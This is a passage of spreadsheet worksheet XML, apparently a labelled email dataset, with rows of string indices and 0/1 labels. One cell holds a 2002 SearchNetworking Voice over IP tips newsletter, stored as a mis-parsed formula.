      </c>
      <c r="C3875" s="1" t="s">
        <v>4311</v>
      </c>
      <c r="D3875" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3876" hidden="1">
      <c r="A3876" s="1">
        <v>3874.0</v>
      </c>
      <c r="B3876" s="1" t="s">
        <v>5816</v>
      </c>
      <c r="C3876" s="1" t="s">
        <v>5817</v>
      </c>
      <c r="D3876" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3877" hidden="1">
      <c r="A3877" s="1">
        <v>3875.0</v>
      </c>
      <c r="B3877" s="1" t="s">
        <v>5424</v>
      </c>
      <c r="C3877" s="1" t="s">
        <v>5425</v>
      </c>
      <c r="D3877" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3878" hidden="1">
      <c r="A3878" s="1">
        <v>3876.0</v>
      </c>
      <c r="B3878" s="1" t="s">
        <v>253</v>
      </c>
      <c r="C3878" s="1" t="s">
        <v>5818</v>
      </c>
      <c r="D3878" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3879" hidden="1">
      <c r="A3879" s="1">
        <v>3877.0</v>
      </c>
      <c r="B3879" s="1" t="s">
        <v>5819</v>
      </c>
      <c r="C3879" s="1" t="s">
        <v>5820</v>
      </c>
      <c r="D3879" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3880" hidden="1">
      <c r="A3880" s="1">
        <v>3878.0</v>
      </c>
      <c r="B3880" s="1" t="s">
        <v>3713</v>
      </c>
      <c r="C3880" s="1" t="s">
        <v>5616</v>
      </c>
      <c r="D3880" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3881">
      <c r="A3881" s="1">
        <v>3879.0</v>
      </c>
      <c r="B3881" s="1" t="s">
        <v>5821</v>
      </c>
      <c r="C3881" s="1" t="s">
        <v>5822</v>
      </c>
      <c r="D3881" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3882">
      <c r="A3882" s="1">
        <v>3880.0</v>
      </c>
      <c r="B3882" s="1" t="s">
        <v>1363</v>
      </c>
      <c r="C3882" s="1" t="s">
        <v>5823</v>
      </c>
      <c r="D3882" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3883" hidden="1">
      <c r="A3883" s="1">
        <v>3881.0</v>
      </c>
      <c r="B3883" s="1" t="s">
        <v>5269</v>
      </c>
      <c r="C3883" s="1" t="s">
        <v>5270</v>
      </c>
      <c r="D3883" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3884" hidden="1">
      <c r="A3884" s="1">
        <v>3882.0</v>
      </c>
      <c r="B3884" s="1" t="s">
        <v>2852</v>
      </c>
      <c r="C3884" s="1" t="s">
        <v>5824</v>
      </c>
      <c r="D3884" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3885" hidden="1">
      <c r="A3885" s="1">
        <v>3883.0</v>
      </c>
      <c r="B3885" s="1" t="s">
        <v>5825</v>
      </c>
      <c r="C3885" s="1" t="s">
        <v>5826</v>
      </c>
      <c r="D3885" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3886" hidden="1">
      <c r="A3886" s="1">
        <v>3884.0</v>
      </c>
      <c r="B3886" s="1" t="s">
        <v>5827</v>
      </c>
      <c r="C3886" s="3" t="str">
        <f>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 SEARCHNETWORKING | Voice over IP Tip
 July 25, 2002
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
 FROM OUR SPONSOR:
 Looking for RISK FREE VoIP?
 http://searchNetworking.com/r/0,,4689,00.htm?quintum
 ________________________________________________________________ 
 IN THIS ISSUE | Table of Contents 
 1. VOIP TIPS 
    - Troubleshooting voice
    - VoIP enable your telephony
    - Understanding delay
 2. IMPORTANT ANNOUNCEMENTS AND LINKS
    - Network management/VoIP/wireless strategies revealed
    - SearchNetworking Webcast archives 
    - Featured Topic: Networks of the future
    - Expert response: Ted Studwell answers your questions
    - Featured book: Microsoft encyclopedia of networking
 ____________________________________________________________________
 ***********************&gt;&gt; SPONSORED BY QUINTUM &lt;&lt;*******************
 LOOKING FOR RISK FREE VoIP?
 Get a RISK FREE VoIP solution that is easy to install and
 cost-effective. Quintum Tenor(R) MultiPath Switches assure voice QoS.
 PATENTED SelectNet provides real-time MID-CALL failover from IP to
 public switched phone network. PacketSaver voice compression reduces
 bandwidth use 50%.  NATAccess works behind NAT-enabled firewalls. 2
 port SOHOs to carrier solutions at:
 http://searchNetworking.com/r/0,,4689,00.htm?quintum
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 TROUBLESHOOTING VOICE | By Tom Lancaster
 When you're troubleshooting voice calls, particularly the signaling,
 it's often helpful to look at the detailed output of the device, be
 it a voice-enabled router, telephony server, gateway or whatever. 
 This detailed output can be in the form of logs or debug output as is
 the case in Cisco's IOS.  In any case, this output is likely to be
 somewhat cryptic.  One of the reasons is because this output often
 uses a set of standardized codes and it is simply easier to put more
 information on the screen using a short number than it is to write an
 essay about why some event happened.
 Read the entire tip at: 
 http://www.searchNetworking.com/tip/1,289483,sid7_gci840618,00.html
 Got a VoIP tip of your own? Why not send it in? We'll post it on our
 Web site, and we'll enter you in our tips contest for some neat
 prizes.   Submit your tip here:
 http://searchnetworking.techtarget.com/tipsSubmit/1,289485,sid7,00.html
 Like this tip?  Hate it?  Email us at
 mailto:tips@searchnetworking.com
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 VoIP ENABLE YOUR TELEPHONY | By Tom Lancaster
 One of the reasons VoIP has been slowly gaining traction is that
 large enterprises have quite a lot of legacy equipment, and migrating
 to VoIP from the circuit-switched networks of yore is no easy feat.
 These environments are typically complicated and the stakes are high
 because so many mission-critical systems rely on telephony.
 Click here for the full tip:
 http://searchnetworking.techtarget.com/tip/1,289483,sid7_gci779073,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 UNDERSTANDING RELAY | By Tom Lancaster
 Everyone knows that delay is one of the two primary causes of poor
 voice quality, particularly in VoIP networks, but where does this
 delay come from?  Delay is generally defined as the time it takes
 from the instant you speak into the phone until the instant that
 sound is regenerated on the far end. Quite a few things have to
 happen to transport this sound through the system, so delay actually
 has many components.
 Read the entire tip here:
 http://searchnetworking.techtarget.com/tip/1,289483,sid7_gci823706,00.html
 ___________________________________________________________________ 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 ::::::::::  DON'T MISS THESE IMPORTANT MESSAGES AND LINKS  ::::::::
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 NETWORK MANAGEMENT/VoIP/WIRELESS STRATEGIES | SearchNetworking
 SearchNetworking.com hosts the Networking Decisions conference in
 Chicago, October 16-18. Sessions focus not only on essential network
 management strategies, but feature critical insight on VoIP and
 wireless. You find out how to best prepare for these technologies now
 so you won't get left behind, the benefits to gain/pitfalls to avoid,
 plus the real ROI for your organization.
 Get the full story right here: http://www.networkingdecisions.com
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 WEBCAST ARCHIVES | SearchNetworking
 If you missed the original airing of our Webcast on the best
 practices for availability and performance management with Jon
 Oltsik, don't fret, it's available for you to view at your leisure. 
 And, while you're at it, take a look at all our previously aired
 Webcasts, as well our upcoming live events.  We're sure you'll find
 topics that interest you. 
 View of archive on best practices for availability and performance
 management with Jon Oltsik:
 http://searchnetworking.techtarget.com/webcastsTranscriptSecurity/1,289693,sid7_gci832106,00.html 
 View our upcoming events and Webcast archive list here:
 http://searchnetworking.techtarget.com/onlineEvents/0,289675,sid7,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
 NETWORKS OF THE FUTURE | SearchNetworking Featured Topic
 Last week we attended Burton Group's Catalyst Conference and heard
 all about the hottest trends in networking: VPNs, VoIP, wireless,
 identity management, and Web services. Read more about the issues
 surrounding each topic.
 Click here for the current Featured Topic:
 http://searchnetworking.techtarget.com/featuredTopic/0,290042,sid7_gci839778,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
 EXPERT ADVICE: TED STUDWELL | Voice over IP Expert
 Dear Ted,
 Where can we get information about Inmarsat services? 
 &gt;&gt; Click for Ted Studwell's response:
 http://searchnetworking.techtarget.com/ateQuestionNResponse/0,289625,sid7_cid478713_tax292243,00.html
 &gt;&gt; Click here for other Q&amp;As with Ted that you might find useful:
 http://searchnetworking.techtarget.com/ateAnswers/0,289620,sid7_tax292243,00.html
 &gt;&gt; Click here to pose your VoIP question to Ted Studwell:
 http://searchnetworking.techtarget.com/ateQuestion/0,289624,sid7_cid466224_tax292243,00.html
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 FEATURED BOOK | SearchNetworking Bookstore
 Title: Microsoft encyclopedia of networking
 Author: Mitch Tulloch, and Ingrid Tulloch
 Description: This second edition of the award-winning Microsoft
 encyclopedia of networking has been fully updated with thousands of
 entries detailing the latest technologies, standards, products, and
 services. You get clear, concise explanations, including hundreds of
 new articles and diagrams that deftly take you from concept to
 real-world application. You also get the entire encyclopedia on
 CD-ROM, for definitive answers wherever you need them.
 &gt;&gt; Click here for ordering information:
 http://www.digitalguru.com/DigitalGuru/product_detail.asp?catalog_name=Books&amp;category_name=&amp;product_id=0735613788&amp;partner_id=65
 ____________________________________________________________________ 
 :::::::::::::::::::  SEARCHNETWORKING CONTACTS   ::::::::::::::::::: 
  SUSAN FOGARTY, Site Editor (sfogarty@techtarget.com) 
    &gt;&gt; Send us your suggestions for tips and articles. 
 ____________________________________________________________________ 
  KARA GATTINE, Assistant Site Editor (kgattine@techtarget.com)
    &gt;&gt; Send your white papers, tips and best Web link recommendations.
 ____________________________________________________________________ 
  BETH QUIMBY, News Editor (bquimby@techtarget.com) 
    &gt;&gt; Send in your product announcements and poll ideas. 
 ____________________________________________________________________ 
  GABRIELLE DERUSSY (gderussy@techtarget.com) 
    &gt;&gt; Sponsor this or any other TechTarget newsletter. 
 ____________________________________________________________________ 
 ::::::::::::::::::::  ABOUT THIS NEWSLETTER   ::::::::::::::::::::: 
 Created by TechTarget (http://www.techtarget.com) 
  TechTarget - The Most Targeted IT Media 
  Copyright 2002, All Rights Reserved.  
 Unsubscribe from 'Voice Over IP Tips'
  - Simply Reply to this Email with REMOVE within the Body or Subject
 &gt;  or
  - Go to: http://searchNetworking.techtarget.com/register
  - Log in to edit your profile.
  - Click on the link to Edit email subscriptions.
  - Uncheck the box next to the newsletter you wish 
    to unsubscribe from.
  - When finished, click "Save Changes to My Profile."
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D3886" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3887" hidden="1">
      <c r="A3887" s="1">
        <v>3885.0</v>
      </c>
      <c r="B3887" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C3887" s="1" t="s">
        <v>3198</v>
      </c>
      <c r="D3887" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3888" hidden="1">
      <c r="A3888" s="1">
        <v>3886.0</v>
      </c>
      <c r="B3888" s="1" t="s">
        <v>5828</v>
      </c>
      <c r="C3888" s="1" t="s">
        <v>5829</v>
      </c>
      <c r="D3888" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3889" hidden="1">
      <c r="A3889" s="1">
        <v>3887.0</v>
      </c>
      <c r="B3889" s="1" t="s">
        <v>5830</v>
      </c>
      <c r="C3889" s="1" t="s">
        <v>5831</v>
      </c>
      <c r="D3889" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3890" hidden="1">
      <c r="A3890" s="1">
        <v>3888.0</v>
      </c>
      <c r="B3890" s="1" t="s">
        <v>5832</v>
      </c>
      <c r="C3890" s="1" t="s">
        <v>5833</v>
      </c>
      <c r="D3890" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3891" hidden="1">
      <c r="A3891" s="1">
        <v>3889.0</v>
      </c>
      <c r="B3891" s="1" t="s">
        <v>140</v>
      </c>
      <c r="C3891" s="1" t="s">
        <v>5719</v>
      </c>
      <c r="D3891" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3892" hidden="1">
      <c r="A3892" s="1">
        <v>3890.0</v>
      </c>
      <c r="B3892" s="1" t="s">
        <v>2599</v>
      </c>
      <c r="C3892" s="1" t="s">
        <v>2600</v>
      </c>
      <c r="D3892" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3893" hidden="1">
      <c r="A3893" s="1">
        <v>3891.0</v>
      </c>
      <c r="B3893" s="1" t="s">
        <v>2037</v>
      </c>
      <c r="C3893" s="1" t="s">
        <v>2038</v>
      </c>
      <c r="D3893" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3894" hidden="1">
      <c r="A3894" s="1">
        <v>3892.0</v>
      </c>
      <c r="B3894" s="1" t="s">
        <v>5834</v>
      </c>
      <c r="C3894" s="1" t="s">
        <v>5835</v>
      </c>
      <c r="D3894" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3895" hidden="1">
      <c r="A3895" s="1">
        <v>3893.0</v>
      </c>
      <c r="B3895" s="1" t="s">
        <v>2603</v>
      </c>
      <c r="C3895" s="1" t="s">
        <v>2604</v>
      </c>
      <c r="D3895" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3896">
      <c r="A3896" s="1">
        <v>3894.0</v>
      </c>
      <c r="B3896" s="1" t="s">
        <v>5836</v>
      </c>
      <c r="C3896" s="1" t="s">
        <v>5837</v>
      </c>
      <c r="D3896" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3897" hidden="1">
      <c r="A3897" s="1">
        <v>3895.0</v>
      </c>
      <c r="B3897" s="1" t="s">
        <v>5838</v>
      </c>
      <c r="C3897" s="1" t="s">
        <v>5839</v>
      </c>
      <c r="D3897" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3898" hidden="1">
      <c r="A3898" s="1">
        <v>3896.0</v>
      </c>
      <c r="B3898" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C3898" s="1" t="s">
        <v>5840</v>
      </c>
      <c r="D3898" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3899" hidden="1">
      <c r="A3899" s="1">
        <v>3897.0</v>
      </c>
      <c r="B3899" s="1" t="s">
        <v>5841</v>
      </c>
      <c r="C3899" s="1" t="s">
        <v>5842</v>
      </c>
      <c r="D3899" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3900" hidden="1">
      <c r="A3900" s="1">
        <v>3898.0</v>
      </c>
      <c r="B3900" s="1" t="s">
        <v>5843</v>
      </c>
      <c r="C3900" s="1" t="s">
        <v>5844</v>
      </c>
      <c r="D3900" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3901" hidden="1">
      <c r="A3901" s="1">
        <v>3899.0</v>
      </c>
      <c r="B3901" s="1" t="s">
        <v>5845</v>
      </c>
      <c r="C3901" s="1" t="s">
        <v>5846</v>
      </c>
      <c r="D3901" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3902">
      <c r="A3902" s="1">
        <v>3900.0</v>
      </c>
      <c r="B3902" s="1" t="s">
        <v>5847</v>
      </c>
      <c r="C3902" s="1" t="s">
        <v>5848</v>
      </c>
      <c r="D3902" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3903" hidden="1">
      <c r="A3903" s="1">
        <v>3901.0</v>
      </c>
      <c r="B3903" s="1" t="s">
        <v>5643</v>
      </c>
      <c r="C3903" s="1" t="s">
        <v>5644</v>
      </c>
      <c r="D3903" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3904" hidden="1">
      <c r="A3904" s="1">
        <v>3902.0</v>
      </c>
      <c r="B3904" s="1" t="s">
        <v>4200</v>
      </c>
      <c r="C3904" s="1" t="s">
        <v>4201</v>
      </c>
      <c r="D3904" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3905">
      <c r="A3905" s="1">
        <v>3903.0</v>
      </c>
      <c r="B3905" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C3905" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D3905" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3906" hidden="1">
      <c r="A3906" s="1">
        <v>3904.0</v>
      </c>
      <c r="B3906" s="1" t="s">
        <v>5849</v>
      </c>
      <c r="C3906" s="1" t="s">
        <v>5850</v>
      </c>
      <c r="D3906" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3907" hidden="1">
      <c r="A3907" s="1">
        <v>3905.0</v>
      </c>
      <c r="B3907" s="1" t="s">
        <v>5851</v>
      </c>
      <c r="C3907" s="1" t="s">
        <v>5852</v>
      </c>
      <c r="D3907" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3908" hidden="1">
      <c r="A3908" s="1">
        <v>3906.0</v>
      </c>
      <c r="B3908" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="C3908" s="1" t="s">
        <v>5853</v>
      </c>
      <c r="D3908" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3909">
      <c r="A3909" s="1">
        <v>3907.0</v>
      </c>
      <c r="B3909" s="1" t="s">
        <v>5854</v>
      </c>
      <c r="C3909" s="1" t="s">
        <v>5855</v>
      </c>
      <c r="D3909" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3910" hidden="1">
      <c r="A3910" s="1">
        <v>3908.0</v>
      </c>
      <c r="B3910" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C3910" s="1" t="s">
        <v>5856</v>
      </c>
      <c r="D3910" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3911" hidden="1">
      <c r="A3911" s="1">
        <v>3909.0</v>
      </c>
      <c r="B3911" s="1" t="s">
        <v>5857</v>
      </c>
      <c r="C3911" s="1" t="s">
        <v>5858</v>
      </c>
      <c r="D3911" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3912" hidden="1">
      <c r="A3912" s="1">
        <v>3910.0</v>
      </c>
      <c r="B3912" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C3912" s="1" t="s">
        <v>193</v>
      </c>
      <c r="D3912" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3913">
      <c r="A3913" s="1">
        <v>3911.0</v>
      </c>
      <c r="B3913" s="1" t="s">
        <v>5859</v>
      </c>
      <c r="C3913" s="1" t="s">
        <v>5860</v>
      </c>
      <c r="D3913" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3914" hidden="1">
      <c r="A3914" s="1">
        <v>3912.0</v>
      </c>
      <c r="B3914" s="1" t="s">
        <v>3798</v>
      </c>
      <c r="C3914" s="1" t="s">
        <v>5861</v>
      </c>
      <c r="D3914" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3915" hidden="1">
      <c r="A3915" s="1">
        <v>3913.0</v>
      </c>
      <c r="B3915" s="1" t="s">
        <v>1331</v>
      </c>
      <c r="C3915" s="1" t="s">
        <v>1332</v>
      </c>
      <c r="D3915" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3916" hidden="1">
      <c r="A3916" s="1">
        <v>3914.0</v>
      </c>
      <c r="B3916" s="1" t="s">
        <v>5862</v>
      </c>
      <c r="C3916" s="1" t="s">
        <v>5863</v>
      </c>
      <c r="D3916" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3917" hidden="1">
      <c r="A3917" s="1">
        <v>3915.0</v>
      </c>
      <c r="B3917" s="1" t="s">
        <v>889</v>
      </c>
      <c r="C3917" s="1" t="s">
        <v>983</v>
      </c>
      <c r="D3917" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3918">
      <c r="A3918" s="1">
        <v>3916.0</v>
      </c>
      <c r="B3918" s="1" t="s">
        <v>5864</v>
      </c>
      <c r="C3918" s="1" t="s">
        <v>5865</v>
      </c>
      <c r="D3918" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3919" hidden="1">
      <c r="A3919" s="1">
        <v>3917.0</v>
      </c>
      <c r="B3919" s="1" t="s">
        <v>5866</v>
      </c>
      <c r="C3919" s="1" t="s">
        <v>5867</v>
      </c>
      <c r="D3919" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3920">
      <c r="A3920" s="1">
        <v>3918.0</v>
      </c>
      <c r="B3920" s="1" t="s">
        <v>5192</v>
      </c>
      <c r="C3920" s="1" t="s">
        <v>5193</v>
      </c>
      <c r="D3920" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3921">
      <c r="A3921" s="1">
        <v>3919.0</v>
      </c>
      <c r="B3921" s="1" t="s">
        <v>4831</v>
      </c>
      <c r="C3921" s="1" t="s">
        <v>5868</v>
      </c>
      <c r="D3921" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3922" hidden="1">
      <c r="A3922" s="1">
        <v>3920.0</v>
      </c>
      <c r="B3922" s="1" t="s">
        <v>5869</v>
      </c>
      <c r="C3922" s="1" t="s">
        <v>5870</v>
      </c>
      <c r="D3922" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3923" hidden="1">
      <c r="A3923" s="1">
        <v>3921.0</v>
      </c>
      <c r="B3923" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C3923" s="1" t="s">
        <v>5871</v>
      </c>
      <c r="D3923" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3924" hidden="1">
      <c r="A3924" s="1">
        <v>3922.0</v>
      </c>
      <c r="B3924" s="1" t="s">
        <v>5872</v>
      </c>
      <c r="C3924" s="1" t="s">
        <v>5873</v>
      </c>
      <c r="D3924" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3925" hidden="1">
      <c r="A3925" s="1">
        <v>3923.0</v>
      </c>
      <c r="B3925" s="1" t="s">
        <v>5874</v>
      </c>
      <c r="C3925" s="1" t="s">
        <v>5875</v>
      </c>
      <c r="D3925" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3926" hidden="1">
      <c r="A3926" s="1">
        <v>3924.0</v>
      </c>
      <c r="B3926" s="1" t="s">
        <v>4122</v>
      </c>
      <c r="C3926" s="1" t="s">
        <v>4123</v>
      </c>
      <c r="D3926" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3927">
      <c r="A3927" s="1">
        <v>3925.0</v>
      </c>
      <c r="B3927" s="1" t="s">
        <v>5876</v>
      </c>
      <c r="C3927" s="1" t="s">
        <v>5877</v>
      </c>
      <c r="D3927" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3928" hidden="1">
      <c r="A3928" s="1">
        <v>3926.0</v>
      </c>
      <c r="B3928" s="1" t="s">
        <v>5878</v>
      </c>
      <c r="C3928" s="1" t="s">
        <v>1675</v>
      </c>
      <c r="D3928" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3929" hidden="1">
      <c r="A3929" s="1">
        <v>3927.0</v>
      </c>
      <c r="B3929" s="1" t="s">
        <v>5879</v>
      </c>
      <c r="C3929" s="1" t="s">
        <v>5880</v>
      </c>
      <c r="D3929" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3930" hidden="1">
      <c r="A3930" s="1">
        <v>3928.0</v>
      </c>
      <c r="B3930" s="1" t="s">
        <v>5881</v>
      </c>
      <c r="C3930" s="1" t="s">
        <v>5882</v>
      </c>
      <c r="D3930" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3931" hidden="1">
      <c r="A3931" s="1">
        <v>3929.0</v>
      </c>
      <c r="B3931" s="1" t="s">
        <v>4729</v>
      </c>
      <c r="C3931" s="1" t="s">
        <v>5883</v>
      </c>
      <c r="D3931" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3932" hidden="1">
      <c r="A3932" s="1">
        <v>3930.0</v>
      </c>
      <c r="B3932" s="1" t="s">
        <v>5884</v>
      </c>
      <c r="C3932" s="1" t="s">
        <v>5885</v>
      </c>
      <c r="D3932" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3933">
      <c r="A3933" s="1">
        <v>3931.0</v>
      </c>
      <c r="B3933" s="1" t="s">
        <v>5886</v>
      </c>
      <c r="C3933" s="1" t="s">
        <v>5887</v>
      </c>
      <c r="D3933" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3934" hidden="1">
      <c r="A3934" s="1">
        <v>3932.0</v>
      </c>
      <c r="B3934" s="1" t="s">
        <v>1409</v>
      </c>
      <c r="C3934" s="1" t="s">
        <v>5888</v>
      </c>
      <c r="D3934" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3935" hidden="1">
      <c r="A3935" s="1">
        <v>3933.0</v>
      </c>
      <c r="B3935" s="1" t="s">
        <v>1477</v>
      </c>
      <c r="C3935" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D3935" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3936" hidden="1">
      <c r="A3936" s="1">
        <v>3934.0</v>
      </c>
      <c r="B3936" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C3936" s="1" t="s">
        <v>2234</v>
      </c>
      <c r="D3936" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3937" hidden="1">
      <c r="A3937" s="1">
        <v>3935.0</v>
      </c>
      <c r="B3937" s="1" t="s">
        <v>4019</v>
      </c>
      <c r="C3937" s="1" t="s">
        <v>4020</v>
      </c>
      <c r="D3937" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3938" hidden="1">
      <c r="A3938" s="1">
        <v>3936.0</v>
      </c>
      <c r="B3938" s="1" t="s">
        <v>4729</v>
      </c>
      <c r="C3938" s="1" t="s">
        <v>5889</v>
      </c>
      <c r="D3938" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3939" hidden="1">
      <c r="A3939" s="1">
        <v>3937.0</v>
      </c>
      <c r="B3939" s="1" t="s">
        <v>3692</v>
      </c>
      <c r="C3939" s="1" t="s">
        <v>5890</v>
      </c>
      <c r="D3939" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3940">
      <c r="A3940" s="1">
        <v>3938.0</v>
      </c>
      <c r="B3940" s="1" t="s">
        <v>5891</v>
      </c>
      <c r="C3940" s="1" t="s">
        <v>5892</v>
      </c>
      <c r="D3940" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3941" hidden="1">
      <c r="A3941" s="1">
        <v>3939.0</v>
      </c>
      <c r="B3941" s="1" t="s">
        <v>4394</v>
      </c>
      <c r="C3941" s="1" t="s">
        <v>5893</v>
      </c>
      <c r="D3941" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3942">
      <c r="A3942" s="1">
        <v>3940.0</v>
      </c>
      <c r="B3942" s="1" t="s">
        <v>5894</v>
      </c>
      <c r="C3942" s="1" t="s">
        <v>5895</v>
      </c>
      <c r="D3942" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3943" hidden="1">
      <c r="A3943" s="1">
        <v>3941.0</v>
      </c>
      <c r="B3943" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C3943" s="1" t="s">
        <v>915</v>
      </c>
      <c r="D3943" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3944">
      <c r="A3944" s="1">
        <v>3942.0</v>
      </c>
      <c r="B3944" s="1" t="s">
        <v>5896</v>
      </c>
      <c r="C3944" s="1" t="s">
        <v>5897</v>
      </c>
      <c r="D3944" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3945" hidden="1">
      <c r="A3945" s="1">
        <v>3943.0</v>
      </c>
      <c r="B3945" s="1" t="s">
        <v>5385</v>
      </c>
      <c r="C3945" s="1" t="s">
        <v>5386</v>
      </c>
      <c r="D3945" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3946" hidden="1">
      <c r="A3946" s="1">
        <v>3944.0</v>
      </c>
      <c r="B3946" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C3946" s="1" t="s">
        <v>5898</v>
      </c>
      <c r="D3946" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3947" hidden="1">
      <c r="A3947" s="1">
        <v>3945.0</v>
      </c>
      <c r="B3947" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C3947" s="1" t="s">
        <v>3645</v>
      </c>
      <c r="D3947" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3948">
      <c r="A3948" s="1">
        <v>3946.0</v>
      </c>
      <c r="B3948" s="1" t="s">
        <v>5899</v>
      </c>
      <c r="C3948" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="D3948" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3949" hidden="1">
      <c r="A3949" s="1">
        <v>3947.0</v>
      </c>
      <c r="B3949" s="1" t="s">
        <v>5900</v>
      </c>
      <c r="C3949" s="1" t="s">
        <v>5901</v>
      </c>
      <c r="D3949" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3950">
      <c r="A3950" s="1">
        <v>3948.0</v>
      </c>
      <c r="B3950" s="1" t="s">
        <v>5902</v>
      </c>
      <c r="C3950" s="1" t="s">
        <v>5903</v>
      </c>
